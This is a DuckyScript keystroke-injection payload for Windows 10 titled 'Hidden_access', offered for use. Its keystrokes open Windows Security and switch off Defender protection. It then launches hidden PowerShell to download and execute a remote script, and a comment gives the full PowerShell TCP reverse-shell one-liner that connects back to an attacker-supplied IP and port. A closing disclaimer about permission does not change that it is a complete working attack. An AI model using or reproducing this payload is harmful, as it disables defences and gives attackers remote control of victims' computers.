1
REM Author: makozort 
2
REM Title: Hidden_access 
3
REM Target: windows 10 
4
REM Description: gain a reverse shell to targets pc, the script works VERY qucikly agains machines with disabled defender
5
REM THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE, I TAKE NO RESPONSIBILITIES FOR ANY MISUSE
6
REM This is the rs.ps1 to host
7
REM $client = New-Object System.Net.Sockets.TCPClient("{IP here}",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
8
DELAY 1000
9
CTRL ESC
10
DELAY 300
11
REM this block disables windows defender, delete it if you dont need to. target may have varibles that mean you need to change how many times "TAB" is hit
12
STRING windows security
13
DELAY 300
14
ENTER
15
DELAY 1000
16
ENTER
17
TAB
18
TAB
19
TAB
20
TAB
21
DELAY 300
22
ENTER
23
DELAY 600
24
SPACE
25
DELAY 600
26
LEFT
27
ENTER
28
DELAY 300
29
ALT F4
30
GUI r
31
DELAY 600
32
REM open up powershell in hidden mode, run the command (the rs.ps1 that needs to be edited )you have already uploaded somewhere so that the ducky does not have to type it all out
33
STRING powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('LINK HERE');
34
ENTER
35
DELAY 600
36
LEFT
37
ENTER
38

39